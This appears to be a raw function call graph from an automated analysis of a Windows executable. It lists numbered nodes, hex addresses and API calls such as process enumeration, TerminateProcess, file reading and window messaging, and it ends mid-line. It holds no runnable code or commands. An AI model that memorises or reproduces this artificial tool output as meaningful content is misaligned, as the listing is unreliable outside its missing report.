103561->103562 103563 c781d6 22 API calls 103562->103563 103564 c7324a 103563->103564 103565 c9014b 22 API calls 103564->103565 103566 c73251 RegisterWindowMessageW 103565->103566 103566->103512 103568 c831a1 103567->103568 103576 c8317d 103567->103576 103600 c905b2 5 API calls __Init_thread_wait 103568->103600 103569 c8318e 103569->103516 103571 c831ab 103571->103576 103601 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103571->103601 103573 c89f47 103573->103569 103603 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103573->103603 103576->103569 103602 c905b2 5 API calls __Init_thread_wait 103576->103602 103578 c73176 103577->103578 103579 cb3c8f 103577->103579 103580 c9014b 22 API calls 103578->103580 103604 ce3c4e 22 API calls 103579->103604 103582 c7317e 103580->103582 103582->103518 103583 cb3c9a 103605 ce0d18 103584->103605 103588 cb3a0c CloseHandle 103587->103588 103589 ce12f9 CreateThread 103587->103589 103588->103521 103589->103588 103608 ce12d1 103589->103608 103591 c7bf73 22 API calls 103590->103591 103592 c72a9c 103591->103592 103593 c7bf73 22 API calls 103592->103593 103594 c72aa4 103593->103594 103595 c7bf73 22 API calls 103594->103595 103596 c72a66 103595->103596 103596->103533 103598 c7bf73 22 API calls 103597->103598 103599 c72ddc 103598->103599 103599->103547 103600->103571 103601->103576 103602->103573 103603->103569 103604->103583 103606 ce0d26 GetCurrentProcess GetCurrentProcess DuplicateHandle 103605->103606 103607 ce0b03 InterlockedExchange 103605->103607 103606->103607 103607->103526 103609 ce12db 103608->103609 103611 ce12e0 103608->103611 103612 ce1196 InterlockedExchange 103609->103612 103613 ce11c7 103612->103613 103614 ce11c1 103612->103614 103616 c9017b 22 API calls 103613->103616 103615 c9017b 22 API calls 103614->103615 103615->103613 103617 ce11d9 ReadFile 103616->103617 103618 ce12a8 103617->103618 103619 ce11fc 103617->103619 103621 ce12c1 InterlockedExchange 103618->103621 103619->103618 103620 ce1206 EnterCriticalSection 103619->103620 103623 ce122e __fread_nolock 103619->103623 103620->103619 103620->103623 103621->103611 103622 ce1279 LeaveCriticalSection ReadFile 103622->103618 103622->103619 103623->103622 103624 c9017b 22 API calls 103623->103624 103624->103623 103625 cc400f 103631 c7eeb0 ISource 103625->103631 103626 c7f0d5 103627 c7f211 PeekMessageW 103627->103631 103628 c7ef07 GetInputState 103628->103627 103628->103631 103629 cc32cd TranslateAcceleratorW 103629->103631 103631->103626 103631->103627 103631->103628 103631->103629 103632 c7f273 TranslateMessage DispatchMessageW 103631->103632 103633 c7f28f PeekMessageW 103631->103633 103634 c7f104 timeGetTime 103631->103634 103635 c7f2af Sleep 103631->103635 103636 cc4183 Sleep 103631->103636 103638 cc33e9 timeGetTime 103631->103638 103657 c7f450 103631->103657 103664 c7f6d0 103631->103664 103687 c82b20 103631->103687 103740 c80340 103631->103740 103763 c8e915 IsDialogMessageW GetClassLongW 103631->103763 103765 ce446f 22 API calls 103631->103765 103766 ce3fe1 82 API calls __wsopen_s 103631->103766 103632->103633 103633->103631 103634->103631 103652 c7f2c0 103635->103652 103636->103652 103637 c8f215 timeGetTime 103637->103652 103764 c8aa65 23 API calls 103638->103764 103641 cc421a GetExitCodeProcess 103645 cc4246 CloseHandle 103641->103645 103646 cc4230 WaitForSingleObject 103641->103646 103643 cc3d51 103647 cc3d59 103643->103647 103644 d0345b GetForegroundWindow 103644->103652 103645->103652 103646->103631 103646->103645 103648 cc42b8 Sleep 103648->103631 103652->103631 103652->103637 103652->103641 103652->103643 103652->103644 103652->103648 103767 cf60b5 22 API calls 103652->103767 103768 cdf292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103652->103768 103769 cddd87 CreateToolhelp32Snapshot Process32FirstW 103652->103769 103658 c7f483 103657->103658 103659 c7f46f 103657->103659 103811 ce3fe1 82 API calls __wsopen_s 103658->103811 103779 c7e960 103659->103779 103662 c7f47a 103662->103631 103663 cc4584 103663->103663 103665 c7f710 103664->103665 103680 c7f7dc ISource 103665->103680 103820 c905b2 5 API calls __Init_thread_wait 103665->103820 103668 cc45d9 103670 c7bf73 22 API calls 103668->103670 103668->103680 103669 c7bf73 22 API calls 103669->103680 103673 cc45f3 103670->103673 103671 c7be2d 40 API calls 103671->103680 103821 c90413 29 API calls __onexit 103673->103821 103675 cc45fd 103822 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103675->103822 103679 c80340 191 API calls 103679->103680 103680->103669 103680->103671 103680->103679 103681 c7bed9 22 API calls 103680->103681 103682 c81ca0 22 API calls 103680->103682 103683 c7fae1 103680->103683 103685 ce3fe1 82 API calls 103680->103685 103819 c8b35c 191 API calls 103680->103819 103823 c905b2 5 API calls __Init_thread_wait 103680->103823 103824 c90413 29 API calls __onexit 103680->103824 103825 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103680->103825 103826 cf5231 102 API calls 103680->103826 103827 cf731e 191 API calls 103680->103827 103681->103680 103682->103680 103683->103631 103685->103680 103688 c82fc0 103687->103688 103689 c82b86 103687->103689 103901 c905b2 5 API calls __Init_thread_wait 103688->103901 103691 cc7bd8 103689->103691 103692 c82ba0 103689->103692 103864 cf7af9 103691->103864 103695 c83160 9 API calls 103692->103695 103694 c82fca 103698 c7b329 22 API calls 103694->103698 103703 c8300b 103694->103703 103697 c82bb0 103695->103697 103696 cc7be4 103696->103631 103699 c83160 9 API calls 103697->103699 103708 c82fe4 103698->103708 103700 c82bc6 103699->103700 103702 c82bfc 103700->103702 103700->103703 103701 cc7bed 103701->103631 103704 cc7bfd 103702->103704 103710 c82c18 __fread_nolock 103702->103710 103703->103701 103903 c7b4c8 22 API calls 103703->103903 103906 ce3fe1 82 API calls __wsopen_s 103704->103906 103707 c83049 103904 c8e6e8 191 API calls 103707->103904 103902 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103708->103902 103710->103707 103711 cc7c15 103710->103711 103720 c9014b 22 API calls 103710->103720 103721 c9017b 22 API calls 103710->103721 103726 c80340 191 API calls 103710->103726 103729 c82d3f 103710->103729 103730 cc7c59 103710->103730 103734 c82dd7 ISource 103710->103734 103907 ce3fe1 82 API calls __wsopen_s 103711->103907 103714 cc7c78 103909 cf61a2 54 API calls _wcslen 103714->103909 103715 c82d4c 103716 c83160 9 API calls 103715->103716 103719 c82d59 103716->103719 103718 c83082 103905 c8fe39 22 API calls 103718->103905 103724 c83160 9 API calls 103719->103724 103719->103734 103720->103710 103721->103710 103723 c82f2d 103723->103631 103727 c82d73 103724->103727 103726->103710 103727->103734 103735 c7bed9 22 API calls 103727->103735 103728 c82e8b ISource 103728->103723 103900 c8e322 22 API calls ISource 103728->103900 103729->103714 103729->103715 103908 ce3fe1 82 API calls __wsopen_s 103730->103908 103731 c83160 9 API calls 103731->103734 103734->103718 103734->103728 103734->103731 103828 c8ac3e 103734->103828 103847 cef94a 103734->103847 103856 cfad47 103734->103856 103861 cf9fe8 103734->103861 103910 ce3fe1 82 API calls __wsopen_s 103734->103910 103735->103734 103759 c80376 ISource 103740->103759 103741 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103741->103759 103742 cc632b 104057 ce3fe1 82 API calls __wsopen_s 103742->104057 103744 c81695 103749 c7bed9 22 API calls 103744->103749 103757 c8049d ISource 103744->103757 103745 c9014b 22 API calls 103745->103759 103747 cc625a 104056 ce3fe1 82 API calls __wsopen_s 103747->104056 103748 cc5cdb 103755 c7bed9 22 API calls 103748->103755 103748->103757 103749->103757 103752 c7bed9 22 API calls 103752->103759 103753 c905b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103753->103759 103755->103757 103756 c7bf73 22 API calls 103756->103759 103757->103631 103758 c90413 29 API calls pre_c_initialization 103758->103759 103759->103741 103759->103742 103759->103744 103759->103745 103759->103747 103759->103748 103759->103752 103759->103753 103759->103756 103759->103757 103759->103758 103760 cc6115 103759->103760 103762 c80aae ISource 103759->103762 104052 c81990 191 API calls 2 library calls 103759->104052 104053 c81e50 41 API calls ISource 103759->104053 104054 ce3fe1 82 API calls __wsopen_s 103760->104054 104055 ce3fe1 82 API calls __wsopen_s 103762->104055 103763->103631 103764->103631 103765->103631 103766->103631 103767->103652 103768->103652 104058 cde80e 103769->104058 103771 cdddd4 Process32NextW 103772 cdde86 CloseHandle 103771->103772 103773 cdddcd 103771->103773 103772->103652 103773->103771 103773->103772 103774 c7bf73 22 API calls 103773->103774 103775 c7b329 22 API calls 103773->103775 104064 c7568e 22 API calls 103773->104064 104065 c77bb5 22 API calls 103773->104065 104066 c8e36b 41 API calls 103773->104066 103774->103773 103775->103773 103780 c80340 191 API calls 103779->103780 103797 c7e99d 103780->103797 103781 cc31d3 103818 ce3fe1 82 API calls __wsopen_s 103781->103818 103783 c7ea0b ISource 103783->103662 103784 c7edd5 103784->103783 103792 c9017b 22 API calls 103784->103792 103785 c7eac3 103785->103784 103787 c7eace 103785->103787 103786 c7ecff 103789 c7ed14 103786->103789 103790 cc31c4 103786->103790 103788 c9014b 22 API calls 103787->103788 103799 c7ead5 __fread_nolock 103788->103799 103793 c9014b 22 API calls 103789->103793 103817 cf6162 22 API calls 103790->103817 103791 c7ebb8 103796 c9017b 22 API calls 103791->103796 103792->103799 103803 c7eb6a 103793->103803 103795 c9014b 22 API calls 103795->103797 103806 c7eb29 ISource __fread_nolock 103796->103806 103797->103781 103797->103783 103797->103784 103797->103785 103797->103791 103797->103795 103797->103806 103798 c9014b 22 API calls 103800 c7eaf6 103798->103800 103799->103798 103799->103800 103800->103806 103812 c7d260 191 API calls 103800->103812 103802 cc31b3 103816 ce3fe1 82 API calls __wsopen_s 103802->103816 103803->103662 103806->103786 103806->103802 103806->103803 103807 cc318e 103806->103807 103809 cc316c 103806->103809 103813 c744fe 191 API calls 103806->103813 103815 ce3fe1 82 API calls __wsopen_s 103807->103815 103814 ce3fe1 82 API calls __wsopen_s 103809->103814 103811->103663 103812->103806 103813->103806 103814->103803 103815->103803 103816->103803 103817->103781 103818->103783 103819->103680 103820->103668 103821->103675 103822->103680 103823->103680 103824->103680 103825->103680 103826->103680 103827->103680 103911 c78ec0 103828->103911 103832 c8ac7f 103842 c8b09b _wcslen 103832->103842 103939 c7c98d 39 API calls 103832->103939 103834 c8bbbe 43 API calls 103834->103842 103835 c94d98 40 API calls 103835->103842 103836 c77ad5 22 API calls 103836->103842 103837 c76c03 22 API calls 103837->103842 103840 c8b1fb 103840->103734 103841 c78ec0 53 API calls 103841->103842 103842->103834 103842->103835 103842->103836 103842->103837 103842->103840 103842->103841 103843 c78577 22 API calls 103842->103843 103844 c7396b 61 API calls 103842->103844 103845 c73907 Shell_NotifyIconW 103842->103845 103846 c7c98d 39 API calls 103842->103846 103940 c7ad40 22 API calls __fread_nolock 103842->103940 103941 c77b1a 22 API calls 103842->103941 103843->103842 103844->103842 103845->103842 103846->103842 103848 c9017b 22 API calls 103847->103848 103849 cef95b 103848->103849 103850 c7423c 22 API calls 103849->103850 103851 cef965 103850->103851 103852 c78ec0 53 API calls 103851->103852 103853 cef97c GetEnvironmentVariableW 103852->103853 103946 ce160f 22 API calls 103853->103946 103855 cef999 ISource 103855->103734 103857 c78ec0 53 API calls 103856->103857 103858 cfad63 103857->103858 103859 cddd87 47 API calls 103858->103859 103860 cfad72 103859->103860 103860->103734 103947 cf89b6 103861->103947 103863 cf9ff8 103863->103734 103865 cf7b38 103864->103865 103866 cf7b52 103864->103866 104046 ce3fe1 82 API calls __wsopen_s 103865->104046 104039 cf60e6 103866->104039 103870 c80340 190 API calls 103871 cf7bc1 103870->103871 103872 cf7c5c 103871->103872 103875 cf7b4a 103871->103875 103877 cf7c03 103871->103877 103873 cf7c62 103872->103873 103874 cf7cb0 103872->103874 104047 ce1ad8 22 API calls 103873->104047 103874->103875 103876 c78ec0 53 API calls 103874->103876 103875->103696 103878 cf7cc2 103876->103878 103880 ce148b 22 API calls 103877->103880 103881 c7c2c9 22 API calls 103878->103881 103883 cf7c3b 103880->103883 103884 cf7ce6 CharUpperBuffW 103881->103884 103882 cf7c85 104048 c7bd07 22 API calls 103882->104048 103886 c82b20 190 API calls 103883->103886 103887 cf7d00 103884->103887 103886->103875 103888 cf7d07 103887->103888 103889 cf7d53 103887->103889 103893 ce148b 22 API calls 103888->103893 103890 c78ec0 53 API calls 103889->103890 103891 cf7d5b 103890->103891 104049 c8aa65 23 API calls 103891->104049 103894 cf7d35 103893->103894 103895 c82b20 190 API calls 103894->103895 103895->103875 103896 cf7d65 103896->103875 103897 c78ec0 53 API calls 103896->103897 103898 cf7d80 103897->103898 104050 c7bd07 22 API calls 103898->104050 103900->103728 103901->103694 103902->103703 103903->103707 103904->103718 103905->103718 103906->103734 103907->103734 103908->103734 103909->103727 103910->103734 103912 c78ed5 103911->103912 103929 c78ed2 103911->103929 103913 c78edd 103912->103913 103914 c78f0b 103912->103914 103942 c95536 26 API calls 103913->103942 103916 c78f1d 103914->103916 103921 cb6a38 103914->103921 103924 cb6b1f 103914->103924 103943 c8fe6f 51 API calls 103916->103943 103919 c78eed 103923 c9014b 22 API calls 103919->103923 103920 cb6b37 103920->103920 103927 cb6ab1 103921->103927 103928 c9017b 22 API calls 103921->103928 103925 c78ef7 103923->103925 103945 c954f3 26 API calls 103924->103945 103926 c7b329 22 API calls 103925->103926 103926->103929 103944 c8fe6f 51 API calls 103927->103944 103931 cb6a81 103928->103931 103934 c8bc58 103929->103934 103930 c9014b 22 API calls 103932 cb6aa8 103930->103932 103931->103930 103933 c7b329 22 API calls 103932->103933 103933->103927 103935 c9014b 22 API calls 103934->103935 103936 c8bc65 103935->103936 103937 c7b329 22 API calls 103936->103937 103938 c8bc70 103937->103938 103938->103832 103939->103842 103940->103842 103941->103842 103942->103919 103943->103919 103944->103924 103945->103920 103946->103855 103948 c78ec0 53 API calls 103947->103948 103949 cf89ed 103948->103949 103974 cf8a32 ISource 103949->103974 103985 cf9730 103949->103985 103951 cf8cde 103952 cf8eac 103951->103952 103956 cf8cec 103951->103956 104025 cf9941 60 API calls 103952->104025 103955 cf8ebb 103955->103956 103957 cf8ec7 103955->103957 103998 cf88e3 103956->103998 103957->103974 103958 c78ec0 53 API calls 103976 cf8aa6 103958->103976 103963 cf8d25 104013 c8ffe0 103963->104013 103966 cf8d5f 103968 c77e12 22 API calls 103966->103968 103967 cf8d45 104020 ce3fe1 82 API calls __wsopen_s 103967->104020 103971 cf8d6e 103968->103971 103970 cf8d50 GetCurrentProcess TerminateProcess 103970->103966 103972 c78470 22 API calls 103971->103972 103973 cf8d87 103972->103973 103984 cf8daf 103973->103984 104021 c81ca0 22 API calls 103973->104021 103974->103863 103976->103951 103976->103958 103976->103974 104018 cd4ad3 22 API calls __fread_nolock 103976->104018 104019 cf8f7a 42 API calls 103976->104019 103977 cf8f22 103977->103974 103979 cf8f36 FreeLibrary 103977->103979 103978 cf8d9e 104022 cf95d8 75 API calls 103978->104022 103979->103974 103984->103977 104023 c81ca0 22 API calls 103984->104023 104024 c7b4c8 22 API calls 103984->104024 104026 cf95d8 75 API calls 103984->104026 103986 c7c2c9 22 API calls 103985->103986 103987 cf974b CharLowerBuffW 103986->103987 104027 cd9805 103987->104027 103991 c7bf73 22 API calls 103992 cf9787 103991->103992 104034 c7acc0 22 API calls __fread_nolock 103992->104034 103994 cf979b 103995 c7adf4 22 API calls 103994->103995 103997 cf97a5 _wcslen 103995->103997 103996 cf98bb _wcslen 103996->103976 103997->103996 104035 cf8f7a 42 API calls 103997->104035 103999 cf88fe 103998->103999 104000 cf8949 103998->104000 104001 c9017b 22 API calls 103999->104001 104004 cf9af3 104000->104004 104002 cf8920 104001->104002 104002->104000 104003 c9014b 22 API calls 104002->104003 104003->104002 104005 cf9d08 ISource 104004->104005 104012 cf9b17 _strcat _wcslen 104004->104012 104005->103963 104006 c7c98d 39 API calls 104006->104012 104007 c7c63f 39 API calls 104007->104012 104008 c7ca5b 39 API calls 104008->104012 104009 c78ec0 53 API calls 104009->104012 104010 c9ed7c 21 API calls ___std_exception_copy 104010->104012 104012->104005 104012->104006 104012->104007 104012->104008 104012->104009 104012->104010 104038 cdf8c5 24 API calls _wcslen 104012->104038 104014 c8fff5 104013->104014 104015 c9008d CreateToolhelp32Snapshot 104014->104015 104016 c9005b 104014->104016 104017 c9007b CloseHandle 104014->104017 104015->104016 104016->103966 104016->103967 104017->104016 104018->103976 104019->103976 104020->103970 104021->103978 104022->103984 104023->103984 104024->103984 104025->103955 104026->103984 104028 cd9825 _wcslen 104027->104028 104029 cd9914 104028->104029 104031 cd9919 104028->104031 104033 cd985a 104028->104033 104029->103991 104029->103997 104031->104029 104037 c8e36b 41 API calls 104031->104037 104033->104029 104036 c8e36b 41 API calls 104033->104036 104034->103994 104035->103996 104036->104033 104037->104031 104038->104012 104040 cf6101 104039->104040 104045 cf614f 104039->104045 104041 c9017b 22 API calls 104040->104041 104043 cf6123 104041->104043 104042 c9014b 22 API calls 104042->104043 104043->104042 104043->104045 104051 ce1400 22 API calls 104043->104051 104045->103870 104046->103875 104047->103882 104048->103875 104049->103896 104050->103875 104051->104043 104052->103759 104053->103759 104054->103762 104055->103757 104056->103757 104057->103757 104059 cde819 104058->104059 104060 cde830 104059->104060 104063 cde836 104059->104063 104067 c96722 GetStringTypeW 104059->104067 104068 c9666b 39 API calls 104060->104068 104063->103773 104064->103773 104065->103773 104066->103773 104067->104059 104068->104063 104069 c7f4c0 104072 c8a025 104069->104072 104071 c7f4cc 104073 c8a0a3 104072->104073 104074 c8a046 104072->104074 104078 c8a0e7 104073->104078 104081 ce3fe1 82 API calls __wsopen_s 104073->104081 104074->104073 104075 c80340 191 API calls 104074->104075 104079 c8a077 104075->104079 104077 cc806b 104077->104077 104078->104071 104079->104073 104079->104078 104080 c7bed9 22 API calls 104079->104080 104080->104073 104081->104077 104082 c9f06e 104083 c9f07a CallCatchBlock 104082->104083 104084 c9f09b 104083->104084 104085 c9f086 104083->104085 104095 c994fd EnterCriticalSection 104084->104095 104101 c9f649 20 API calls _abort 104085->104101 104088 c9f08b 104102 ca2b5c 26 API calls _abort 104088->104102 104089 c9f0a7 104096 c9f0db 104089->104096 104094 c9f096 __fread_nolock 104095->104089 104104 c9f106 104096->104104 104098 c9f0e8 104099 c9f0b4 104098->104099 104124 c9f649 20 API calls _abort 104098->104124 104103 c9f0d1 LeaveCriticalSection __fread_nolock 104099->104103 104101->104088 104102->104094 104103->104094 104105 c9f12e 104104->104105 104106 c9f114 104104->104106 104108 c9dcc5 __fread_nolock 26 API calls 104105->104108 104128 c9f649 20 API calls _abort 104106->104128 104110 c9f137 104108->104110 104109 c9f119 104129 ca2b5c 26 API calls _abort 104109->104129 104125 ca9789 104110->104125 104112 c9f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104112->104098 104115 c9f23b 104117 c9f248 104115->104117 104121 c9f1ee 104115->104121 104116 c9f1bf 104118 c9f1dc 104116->104118 104116->104121 104131 c9f649 20 API calls _abort 104117->104131 104130 c9f41f 31 API calls 4 library calls 104118->104130 104121->104112 104132 c9f29b 30 API calls 2 library calls 104121->104132 104122 c9f1e6 104122->104112 104124->104099 104133 ca9606 104125->104133 104127 c9f153 104127->104112 104127->104115 104127->104116 104128->104109 104129->104112 104130->104122 104131->104112 104132->104112 104134 ca9612 CallCatchBlock 104133->104134 104135 ca961a 104134->104135 104136 ca9632 104134->104136 104168 c9f636 20 API calls _abort 104135->104168 104138 ca96e6 104136->104138 104142 ca966a 104136->104142 104173 c9f636 20 API calls _abort 104138->104173 104139 ca961f 104169 c9f649 20 API calls _abort 104139->104169 104158 ca54ba EnterCriticalSection 104142->104158 104143 ca96eb 104174 c9f649 20 API calls _abort 104143->104174 104146 ca9670 104148 ca96a9 104146->104148 104149 ca9694 104146->104149 104147 ca96f3 104175 ca2b5c 26 API calls _abort 104147->104175 104159 ca970b 104148->104159 104170 c9f649 20 API calls _abort 104149->104170 104151 ca9627 __fread_nolock 104151->104127 104154 ca9699 104171 c9f636 20 API calls _abort 104154->104171 104155 ca96a4 104172 ca96de LeaveCriticalSection __wsopen_s 104155->104172 104158->104146 104176 ca5737 104159->104176 104161 ca971d 104162 ca9736 SetFilePointerEx 104161->104162 104163 ca9725 104161->104163 104165 ca974e GetLastError 104162->104165 104166 ca972a 104162->104166 104189 c9f649 20 API calls _abort 104163->104189 104190 c9f613 20 API calls __dosmaperr 104165->104190 104166->104155 104168->104139 104169->104151 104170->104154 104171->104155 104172->104151 104173->104143 104174->104147 104175->104151 104177 ca5759 104176->104177 104178 ca5744 104176->104178 104183 ca577e 104177->104183 104193 c9f636 20 API calls _abort 104177->104193 104191 c9f636 20 API calls _abort 104178->104191 104180 ca5749 104192 c9f649 20 API calls _abort 104180->104192 104183->104161 104184 ca5789 104194 c9f649 20 API calls _abort 104184->104194 104185 ca5751 104185->104161 104187 ca5791 104195 ca2b5c 26 API calls _abort 104187->104195 104189->104166 104190->104166 104191->104180 104192->104185 104193->104184 104194->104187 104195->104185 104196 ca8782 104201 ca853e 104196->104201 104199 ca87aa 104206 ca856f try_get_first_available_module 104201->104206 104203 ca876e 104220 ca2b5c 26 API calls _abort 104203->104220 104205 ca86c3 104205->104199 104213 cb0d04 104205->104213 104212 ca86b8 104206->104212 104216 c9917b 40 API calls 2 library calls 104206->104216 104208 ca870c 104208->104212 104217 c9917b 40 API calls 2 library calls 104208->104217 104210 ca872b 104210->104212 104218 c9917b 40 API calls 2 library calls 104210->104218 104212->104205 104219 c9f649 20 API calls _abort 104212->104219 104221 cb0401 104213->104221 104215 cb0d1f 104215->104199 104216->104208 104217->104210 104218->104212 104219->104203 104220->104205 104224 cb040d CallCatchBlock 104221->104224 104222 cb041b 104279 c9f649 20 API calls _abort 104222->104279 104224->104222 104226 cb0454 104224->104226 104225 cb0420 104280 ca2b5c 26 API calls _abort 104225->104280 104232 cb09db 104226->104232 104231 cb042a __fread_nolock 104231->104215 104282 cb07af 104232->104282 104235 cb0a0d 104314 c9f636 20 API calls _abort 104235->104314 104236 cb0a26 104300 ca5594 104236->104300 104239 cb0a12 104315 c9f649 20 API calls _abort 104239->104315 104240 cb0a2b 104241 cb0a4b 104240->104241 104242 cb0a34 104240->104242 104313 cb071a CreateFileW 104241->104313 104316 c9f636 20 API calls _abort 104242->104316 104246 cb0a39 104317 c9f649 20 API calls _abort 104246->104317 104248 cb0b01 GetFileType 104250 cb0b0c GetLastError 104248->104250 104251 cb0b53 104248->104251 104249 cb0ad6 GetLastError 104319 c9f613 20 API calls __dosmaperr 104249->104319 104320 c9f613 20 API calls __dosmaperr 104250->104320 104322 ca54dd 21 API calls 2 library calls 104251->104322 104253 cb0a84 104253->104248 104253->104249 104318 cb071a CreateFileW 104253->104318 104255 cb0b1a CloseHandle 104255->104239 104257 cb0b43 104255->104257 104321 c9f649 20 API calls _abort 104257->104321 104259 cb0ac9 104259->104248 104259->104249 104261 cb0b74 104263 cb0bc0 104261->104263 104323 cb092b 72 API calls 3 library calls 104261->104323 104262 cb0b48 104262->104239 104267 cb0bed 104263->104267 104324 cb04cd 72 API calls 4 library calls 104263->104324 104266 cb0be6 104266->104267 104269 cb0bfe 104266->104269 104325 ca8a2e 104267->104325 104270 cb0478 104269->104270 104271 cb0c7c CloseHandle 104269->104271 104281 cb04a1 LeaveCriticalSection __wsopen_s 104270->104281 104340 cb071a CreateFileW 104271->104340 104273 cb0ca7 104274 cb0cdd 104273->104274 104275 cb0cb1 GetLastError 104273->104275 104274->104270 104341 c9f613 20 API calls __dosmaperr 104275->104341 104277 cb0cbd 104342 ca56a6 21 API calls 2 library calls 104277->104342 104279->104225 104280->104231 104281->104231 104283 cb07d0 104282->104283 104290 cb07ea 104282->104290 104283->104290 104350 c9f649 20 API calls _abort 104283->104350 104285 cb0822 104289 cb0851 104285->104289 104352 c9f649 20 API calls _abort 104285->104352 104287 cb07df 104351 ca2b5c 26 API calls _abort 104287->104351 104297 cb08a4 104289->104297 104354 c9da7d 26 API calls 2 library calls 104289->104354 104343 cb073f 104290->104343 104293 cb089f 104295 cb091e 104293->104295 104293->104297 104294 cb0846 104353 ca2b5c 26 API calls _abort 104294->104353 104355 ca2b6c 11 API calls _abort 104295->104355 104297->104235 104297->104236 104299 cb092a 104301 ca55a0 CallCatchBlock 104300->104301 104358 ca32d1 EnterCriticalSection 104301->104358 104304 ca55cc 104306 ca5373 __wsopen_s 21 API calls 104304->104306 104305 ca5617 __fread_nolock 104305->104240 104308 ca55d1 104306->104308 104307 ca55a7 104307->104304 104309 ca563a EnterCriticalSection 104307->104309 104310 ca55ee 104307->104310 104308->104310 104362 ca54ba EnterCriticalSection 104308->104362 104309->104310 104311 ca5647 LeaveCriticalSection 104309->104311 104359 ca569d 104310->104359 104311->104307 104313->104253 104314->104239 104315->104270 104316->104246 104317->104239 104318->104259 104319->104239 104320->104255 104321->104262 104322->104261 104323->104263 104324->104266 104326 ca5737 __wsopen_s 26 API calls 104325->104326 104329 ca8a3e 104326->104329 104327 ca8a44 104364 ca56a6 21 API calls 2 library calls 104327->104364 104329->104327 104332 ca5737 __wsopen_s 26 API calls 104329->104332 104339 ca8a76 104329->104339 104330 ca5737 __wsopen_s 26 API calls 104333 ca8a82 CloseHandle 104330->104333 104331 ca8a9c 104337 ca8abe 104331->104337 104365 c9f613 20 API calls __dosmaperr 104331->104365 104334 ca8a6d 104332->104334 104333->104327 104335 ca8a8e GetLastError 104333->104335 104338 ca5737 __wsopen_s 26 API calls 104334->104338 104335->104327 104337->104270 104338->104339 104339->104327 104339->104330 104340->104273 104341->104277 104342->104274 104345 cb0757 104343->104345 104344 cb0772 104344->104285 104345->104344 104356 c9f649 20 API calls _abort 104345->104356 104347 cb0796 104357 ca2b5c 26 API calls _abort 104347->104357 104349 cb07a1 104349->104285 104350->104287 104351->104290 104352->104294 104353->104289 104354->104293 104355->104299 104356->104347 104357->104349 104358->104307 104363 ca3319 LeaveCriticalSection 104359->104363 104361 ca56a4 104361->104305 104362->104310 104363->104361 104364->104331 104365->104337 104366 cc1ac5 104367 cc1acd 104366->104367 104370 c7d535 104366->104370 104406 cd7a87 22 API calls __fread_nolock 104367->104406 104369 cc1adf 104407 cd7a00 22 API calls __fread_nolock 104369->104407 104372 c9014b 22 API calls 104370->104372 104374 c7d589 104372->104374 104373 cc1b09 104375 c80340 191 API calls 104373->104375 104396 c7c32d 104374->104396 104376 cc1b30 104375->104376 104377 cc1b44 104376->104377 104408 cf61a2 54 API calls _wcslen 104376->104408 104381 c9014b 22 API calls 104388 c7d66e ISource 104381->104388 104382 cc1b61 104382->104370 104409 cd7a87 22 API calls __fread_nolock 104382->104409 104387 cc1f79 104411 cd56ae 22 API calls ISource 104387->104411 104388->104387 104389 cc1f94 104388->104389 104391 c7bed9 22 API calls 104388->104391 104393 c7d911 ISource 104388->104393 104403 c7c3ab 22 API calls ISource 104388->104403 104410 c7b4c8 22 API calls 104388->104410 104391->104388 104394 c7d9ac ISource 104393->104394 104404 c7c3ab 22 API calls ISource 104393->104404 104395 c7d9c3 104394->104395 104405 c8e30a 22 API calls ISource 104394->104405 104399 c7c33d 104396->104399 104397 c7c345 104397->104381 104398 c9014b 22 API calls 104398->104399 104399->104397 104399->104398 104400 c7bf73 22 API calls 104399->104400 104401 c7bed9 22 API calls 104399->104401 104402 c7c32d 22 API calls 104399->104402 104400->104399 104401->104399 104402->104399 104403->104388 104404->104394 104405->104394 104406->104369 104407->104373 104408->104382 104409->104382 104410->104388 104411->104389 104412 cb2782 104415 c72ab0 104412->104415 104416 cb3a1a DestroyWindow 104415->104416 104417 c72aef mciSendStringW 104415->104417 104429 cb3a26 104416->104429 104418 c72d66 104417->104418 104419 c72b0b 104417->104419 104418->104419 104421 c72d75 UnregisterHotKey 104418->104421 104420 c72b19 104419->104420 104419->104429 104451 c72ede 104420->104451 104421->104418 104423 cb3a44 FindClose 104423->104429 104425 cb3a6b 104428 cb3a7e FreeLibrary 104425->104428 104430 cb3a8f 104425->104430 104426 c77aab CloseHandle 104426->104429 104427 c72b2e 104427->104430 104438 c72b3c 104427->104438 104428->104425 104429->104423 104429->104425 104429->104426 104431 cb3aa3 VirtualFree 104430->104431 104432 cb3ad1 104430->104432 104431->104430 104434 c72ba9 104432->104434 104455 ce0b4c 104432->104455 104433 c72b98 CoUninitialize 104433->104432 104433->104434 104435 cb3aeb 104434->104435 104436 c72bb4 104434->104436 104443 cb3afa ISource 104435->104443 104462 ce3d30 6 API calls ISource 104435->104462 104439 c72bc4 104436->104439 104438->104433 104460 c72ff4 24 API calls 104439->104460 104441 c72bda 104461 c72e1c 22 API calls 104441->104461 104446 cb3b89 104443->104446 104463 cd6e3b 22 API calls ISource 104443->104463 104452 c72eeb 104451->104452 104453 c72b20 104452->104453 104464 cd7991 22 API calls 104452->104464 104453->104425 104453->104427 104465 ce1312 104455->104465 104458 ce0b7f DeleteCriticalSection 104458->104434 104459 ce0b6b 104459->104458 104460->104441 104462->104435 104463->104443 104464->104452 104466 ce0b5a CloseHandle 104465->104466 104467 ce131b InterlockedExchange 104465->104467 104466->104459 104467->104466 104468 ce132f EnterCriticalSection TerminateThread WaitForSingleObject 104467->104468 104469 ce135c CloseHandle 104468->104469 104470 ce1369 InterlockedExchange LeaveCriticalSection 104468->104470 104469->104470 104470->104466 104471 ca947a 104472 ca949f 104471->104472 104473 ca9487 104471->104473 104477 ca94fa 104472->104477 104485 ca9497 104472->104485 104523 cb0144 21 API calls 2 library calls 104472->104523 104521 c9f649 20 API calls _abort 104473->104521 104475 ca948c 104522 ca2b5c 26 API calls _abort 104475->104522 104479 c9dcc5 __fread_nolock 26 API calls 104477->104479 104480 ca9512 104479->104480 104491 